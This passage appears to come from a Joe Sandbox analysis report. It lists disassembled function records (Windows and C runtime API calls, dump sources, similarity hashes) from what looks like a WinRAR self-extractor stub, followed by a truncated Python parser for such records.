• API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
• String ID: rtmp%d
• API String ID: 3726343395-3303766350
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_top.jbxd
Similarity
• API ID: _wcslen
• String ID: UF$pF$zF
• API String ID: 176396367-3070487249
APIs
• ShowWindow.USER32(?,00000000), ref: 00469EEE
• GetWindowRect.USER32(?,00000000), ref: 00469F44
• ShowWindow.USER32(?,00000005,00000000), ref: 00469FDB
• SetWindowTextW.USER32(?,00000000), ref: 00469FE3
• ShowWindow.USER32(00000000,00000005), ref: 00469FF9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_top.jbxd
Similarity
• API ID: Window$Show$RectText
• String ID: F$RarHtmlClassName
• API String ID: 3937224194-807982621
APIs
• __aulldiv.LIBCMT ref: 0046122E
  • Part of subcall function 0045B146: GetVersionExW.KERNEL32(?), ref: 0045B16B
• FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00461251
• FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00461263
• SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00461274
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00461284
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00461294
• FileTimeToSystemTime.KERNEL32(?,?,?), ref: 004612CF
• __aullrem.LIBCMT ref: 00461379
Memory Dump Source
• Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_top.jbxd
Similarity
• API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
• String ID:
• API String ID: 1247370737-0
APIs
• _swprintf.LIBCMT ref: 00452536
  • Part of subcall function 00454092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004540A5
  • Part of subcall function 004605DA: _wcslen.LIBCMT ref: 004605E0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_top.jbxd
Similarity
• API ID: __vswprintf_c_l_swprintf_wcslen
• String ID: ;%u$x%u$xc%u
• API String ID: 3053425827-2277559157
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_top.jbxd
Similarity
• API ID: _wcslen
• String ID: </p>$</style>$<br>$<style>$>
• API String ID: 176396367-3568243669
APIs
• GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0047FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 0047F6CF
• __fassign.LIBCMT ref: 0047F74A
• __fassign.LIBCMT ref: 0047F765
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0047F78B
• WriteFile.KERNEL32(?,00000000,00000000,0047FE02,00000000,?,?,?,?,?,?,?,?,?,0047FE02,00000000), ref: 0047F7AA
• WriteFile.KERNEL32(?,00000000,00000001,0047FE02,00000000,?,?,?,?,?,?,?,?,?,0047FE02,00000000), ref: 0047F7E3
Memory Dump Source
• Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_top.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
APIs
• GetTempPathW.KERNEL32(00000800,?), ref: 0046CE9D
  • Part of subcall function 0045B690: _wcslen.LIBCMT ref: 0045B696
• _swprintf.LIBCMT ref: 0046CED1
  • Part of subcall function 00454092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004540A5
• SetDlgItemTextW.USER32(?,00000066,0049946A), ref: 0046CEF1
• _wcschr.LIBVCRUNTIME ref: 0046CF22
• EndDialog.USER32(?,00000001), ref: 0046CFFE
Strings
Memory Dump Source
• Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_top.jbxd
Similarity
• API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
• String ID: %s%s%u
• API String ID: 689974011-1360425832
APIs
• _ValidateLocalCookies.LIBCMT ref: 00472937
• ___except_validate_context_record.LIBVCRUNTIME ref: 0047293F
• _ValidateLocalCookies.LIBCMT ref: 004729C8
• __IsNonwritableInCurrentImage.LIBCMT ref: 004729F3
• _ValidateLocalCookies.LIBCMT ref: 00472A48
Strings
Memory Dump Source
• Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_top.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
                                                                  • Opcode ID: aa19ddc957e1df99fdf7076f39fb713a42b1cb874a50e72ee896783d7ddf762e
                                                                  • Instruction ID: 8907f0f1beb479eb49036437f66359558885f132e40ff7d20b8490e8da9ee2fa
                                                                  • Opcode Fuzzy Hash: aa19ddc957e1df99fdf7076f39fb713a42b1cb874a50e72ee896783d7ddf762e
                                                                  • Instruction Fuzzy Hash: 5641F974A00208AFCF10EF29C881ADE7BB1EF44314F14C06BE9186B352C7B9DA45CB95
APIs
Memory Dump Source
• Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_top.jbxd
Similarity
• API ID: _wcslen
• String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
• API String ID: 176396367-3743748572
• Opcode ID: 99ce501116e6883b3b8c6ad1f9aaefbc8c4ad2ca7b880bd00a275e72147c281e
• Instruction ID: afce683c444ff777f2a0bf37de135ada08faf29935b7bd33be9f90c047195b40
• Opcode Fuzzy Hash: 99ce501116e6883b3b8c6ad1f9aaefbc8c4ad2ca7b880bd00a275e72147c281e
• Instruction Fuzzy Hash: F9315C7264438166D630AF945C027BB73E8EB80324F60841FE48697380FAFCAD4583AF
APIs
  • Part of subcall function 0047C868: _free.LIBCMT ref: 0047C891
• _free.LIBCMT ref: 0047C8F2
  • Part of subcall function 00478DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0047C896,00483A34,00000000,00483A34,00000000,?,0047C8BD,00483A34,00000007,00483A34,?,0047CCBA,00483A34), ref: 00478DE2
  • Part of subcall function 00478DCC: GetLastError.KERNEL32(00483A34,?,0047C896,00483A34,00000000,00483A34,00000000,?,0047C8BD,00483A34,00000007,00483A34,?,0047CCBA,00483A34,00483A34), ref: 00478DF4
• _free.LIBCMT ref: 0047C8FD
• _free.LIBCMT ref: 0047C908
• _free.LIBCMT ref: 0047C95C
• _free.LIBCMT ref: 0047C967
• _free.LIBCMT ref: 0047C972
• _free.LIBCMT ref: 0047C97D
Memory Dump Source
• Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_top.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
• Instruction ID: 5052e116d3c370da901e9efc87e1316b4caecccbaeae94b599072deeafb7b29a
• Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
• Instruction Fuzzy Hash: D8114F71580B04EAE530B7B2CC8BFCB7BAC9F10B09F418C1EB29D76093DA69B5098755
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0046E669,0046E5CC,0046E86D), ref: 0046E605
• GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0046E61B
• GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0046E630
Memory Dump Source
• Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_top.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
• API String ID: 667068680-1718035505
• Opcode ID: fedf95444448e1229da0d48f43671c544a93ac93122bad900a39ba9d33d31667
• Instruction ID: cf61d97d4ec992a4e9ec2023a00750409dc3d661adde54c0c41bcbd012815b41
• Opcode Fuzzy Hash: fedf95444448e1229da0d48f43671c544a93ac93122bad900a39ba9d33d31667
• Instruction Fuzzy Hash: 3CF0C2397802229B4B225E6ADC946AB26D86A357453A0093BD901D3314FB1CCC556B9F
APIs
• _free.LIBCMT ref: 0047891E
  • Part of subcall function 00478DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0047C896,00483A34,00000000,00483A34,00000000,?,0047C8BD,00483A34,00000007,00483A34,?,0047CCBA,00483A34), ref: 00478DE2
  • Part of subcall function 00478DCC: GetLastError.KERNEL32(00483A34,?,0047C896,00483A34,00000000,00483A34,00000000,?,0047C8BD,00483A34,00000007,00483A34,?,0047CCBA,00483A34,00483A34), ref: 00478DF4
• _free.LIBCMT ref: 00478930
• _free.LIBCMT ref: 00478943
• _free.LIBCMT ref: 00478954
• _free.LIBCMT ref: 00478965
Memory Dump Source
• Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_top.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID: pH
• API String ID: 776569668-1451419334
• Opcode ID: 9e419aa64d9b0cf559226d4d621f1f4ecfa28ab6a12de64db0e81d563c496348
• Instruction ID: 402658f0ec3e8bbb80a9a4be95155cab9b8e21eb911c9dadbd6def7da61f48ef
• Opcode Fuzzy Hash: 9e419aa64d9b0cf559226d4d621f1f4ecfa28ab6a12de64db0e81d563c496348
• Instruction Fuzzy Hash: E2F030B18501168F861A7F16FE054593BA1FB25724300576FF118962B1CBB949459B8D
APIs
• SystemTimeToFileTime.KERNEL32(?,?), ref: 004614C2
  • Part of subcall function 0045B146: GetVersionExW.KERNEL32(?), ref: 0045B16B
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004614E6
• FileTimeToSystemTime.KERNEL32(?,?), ref: 00461500
• TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00461513
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00461523
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00461533
Memory Dump Source
• Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_top.jbxd
Similarity
• API ID: Time$File$System$Local$SpecificVersion
• String ID:
• API String ID: 2092733347-0
• Opcode ID: 1ebe05884ca0b7019780e891dc315ce08c5079df9917370b61c3d01971dd8df3
• Instruction ID: 9349242728214839dc3ac10208e437bec8973179ae748d44d66f9f42a6a6bc3b
• Opcode Fuzzy Hash: 1ebe05884ca0b7019780e891dc315ce08c5079df9917370b61c3d01971dd8df3
• Instruction Fuzzy Hash: 9631F775108355ABC700DFA8C88499BB7E8BF98B54F044A2EF995C3210E734D509CBAA
APIs
• GetLastError.KERNEL32(?,?,00472AF1,004702FC,0046FA34), ref: 00472B08
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00472B16
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00472B2F
• SetLastError.KERNEL32(00000000,00472AF1,004702FC,0046FA34), ref: 00472B81
Memory Dump Source
• Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_top.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: 6c4ecb48445ed91932df792687a845e2e527dbe10dec63a67c18c6e272b5a907
• Instruction ID: 815179a619f58a50895266c9cbefe8642fe4b5e8f0febb1d86eb1b15023d4fe8
• Opcode Fuzzy Hash: 6c4ecb48445ed91932df792687a845e2e527dbe10dec63a67c18c6e272b5a907
• Instruction Fuzzy Hash: EB0128322083112EA6242F767D459DB2B48EB02B79B208B3FF018452E4EF99AC00624C
APIs
• GetLastError.KERNEL32(?,00491030,00474674,00491030,?,?,00473F73,00000050,?,00491030,00000200), ref: 004797E9
• _free.LIBCMT ref: 0047981C
• _free.LIBCMT ref: 00479844
• SetLastError.KERNEL32(00000000,?,00491030,00000200), ref: 00479851
• SetLastError.KERNEL32(00000000,?,00491030,00000200), ref: 0047985D
• _abort.LIBCMT ref: 00479863
Memory Dump Source
• Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_top.jbxd
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0
• Opcode ID: c5fad185185a4895ab084da2ac5e4847ba5d85a52de5bef775e47b2f144f0cfa
• Instruction ID: b5127945728908d75795166a2acb0c407c814b1b7f33d6dde0a8d020b72607fb
• Opcode Fuzzy Hash: c5fad185185a4895ab084da2ac5e4847ba5d85a52de5bef775e47b2f144f0cfa
• Instruction Fuzzy Hash: BEF0F93519060166C75137266C09BDF1A658FD3B79F36853FF51CA6292FE2C8C06426E
APIs
• WaitForSingleObject.KERNEL32(?,0000000A), ref: 0046DC47
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0046DC61
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0046DC72
• TranslateMessage.USER32(?), ref: 0046DC7C
• DispatchMessageW.USER32(?), ref: 0046DC86
• WaitForSingleObject.KERNEL32(?,0000000A), ref: 0046DC91
Memory Dump Source
• Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_top.jbxd
Similarity
• API ID: Message$ObjectSingleWait$DispatchPeekTranslate
• String ID:
• API String ID: 2148572870-0
• Opcode ID: 8754194188d7e94c436b205bcb89b3bbf83385f6642ee653e4b11c638958a5c9
• Instruction ID: 26322f50f4321460e745249e71f49c1e31367dcdf761ab1957ced243a6a70f1b
• Opcode Fuzzy Hash: 8754194188d7e94c436b205bcb89b3bbf83385f6642ee653e4b11c638958a5c9
• Instruction Fuzzy Hash: 86F03C72E01219BBCB206FA6DC4CDCF7F6DEF42792B004521B50AE2054E6789646C7A5
APIs
  • Part of subcall function 0046A699: GetDC.USER32(00000000), ref: 0046A69D
  • Part of subcall function 0046A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0046A6A8
  • Part of subcall function 0046A699: ReleaseDC.USER32(00000000,00000000), ref: 0046A6B3
• GetObjectW.GDI32(?,00000018,?), ref: 0046A83C
  • Part of subcall function 0046AAC9: GetDC.USER32(00000000), ref: 0046AAD2
  • Part of subcall function 0046AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0046AB01
  • Part of subcall function 0046AAC9: ReleaseDC.USER32(00000000,?), ref: 0046AB99
Memory Dump Source
• Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_top.jbxd
Similarity
• API ID: ObjectRelease$CapsDevice
• String ID: "F$($AF
• API String ID: 1061551593-179185017
• Opcode ID: 3d8b20a9243d1d418164e4ff87e1a9e0bd92fb0032c1136fc719d7771f42369c
• Instruction ID: 527b6c7a7a4d2fe8de9af49324cc47b9c0bc2c3d0a43d9600cc28aa2725a3f9c
• Opcode Fuzzy Hash: 3d8b20a9243d1d418164e4ff87e1a9e0bd92fb0032c1136fc719d7771f42369c
• Instruction Fuzzy Hash: DD91EF71608750AFD610DF65C884A2BBBE8FFC9701F00496EF59AD3220DB34A906CF66
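The function records on this page all follow one layout: an APIs list (direct calls plus "Part of subcall function" lines), the Memory Dump Source, the IDA plugin snapshot, and a Similarity block whose API ID, String ID, Opcode ID and fuzzy hashes are the values an analyst pivots on across reports. The parser below is an added example, not Joe Sandbox's own tooling: it turns records pasted from a report into dicts, and two helper functions show the pivots that matter most here, listing the export names resolved through GetProcAddress (the pattern at 0046E61B and 0046E630 above) and indexing records by Opcode ID. The sample input is two records copied from this page with their repeated Associated lines left out; field names and helper names are this example's own choices.

```python
"""Parser for Joe Sandbox per-function records (APIs / Memory Dump Source /
Similarity blocks). Added example, not Joe Sandbox tooling."""
import re
from typing import Dict, List, Optional

BULLET = "•"
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}

# "Name.MODULE(args), ref: ADDR" or "Name.MODULE ref: ADDR"
CALL_RE = re.compile(
    r"^(?P<name>[^.(\s]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s+ref:\s+(?P<ref>[0-9A-Fa-f]{8})$")
SUBCALL_RE = re.compile(
    r"^Part of subcall function (?P<fn>[0-9A-Fa-f]{8}):\s+(?P<rest>.+)$")
SOURCE_RE = re.compile(
    r"^Source File:\s+(?P<file>\S+),\s+Offset:\s+(?P<offset>[0-9A-Fa-f]{8})")

# Constructed sample: two records copied from the report above, without the
# repeated "Associated:" dump lines.
SAMPLE_RECORDS = """\
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0046E669,0046E5CC,0046E86D), ref: 0046E605
• GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0046E61B
• GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0046E630
Memory Dump Source
• Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_top.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
• API String ID: 667068680-1718035505
• Opcode ID: fedf95444448e1229da0d48f43671c544a93ac93122bad900a39ba9d33d31667
• Instruction Fuzzy Hash: 3CF0C2397802229B4B225E6ADC946AB26D86A357453A0093BD901D3314FB1CCC556B9F
APIs
• _free.LIBCMT ref: 0047891E
  • Part of subcall function 00478DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0047C896), ref: 00478DE2
• _free.LIBCMT ref: 00478930
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID: pH
• Opcode ID: 9e419aa64d9b0cf559226d4d621f1f4ecfa28ab6a12de64db0e81d563c496348
"""


def _new_record() -> Dict:
    return {"apis": [], "source_file": None, "offset": None,
            "similarity": {}, "strings": []}


def _parse_call(text: str, caller: Optional[str]) -> Optional[Dict]:
    """One API line; `caller` is the subcall function address, if any."""
    m = CALL_RE.match(text)
    if not m:
        return None
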